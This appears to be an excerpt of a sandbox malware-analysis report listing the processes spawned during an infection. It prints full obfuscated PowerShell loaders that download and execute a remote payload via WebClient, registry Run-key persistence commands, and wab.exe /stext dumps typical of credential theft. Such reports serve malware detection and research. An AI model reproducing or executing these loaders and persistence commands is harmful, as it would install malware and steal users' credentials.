$Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeProcess created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
              Source: C:\Windows\SysWOW64\relog.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.naJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs" Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"Jump to behavior
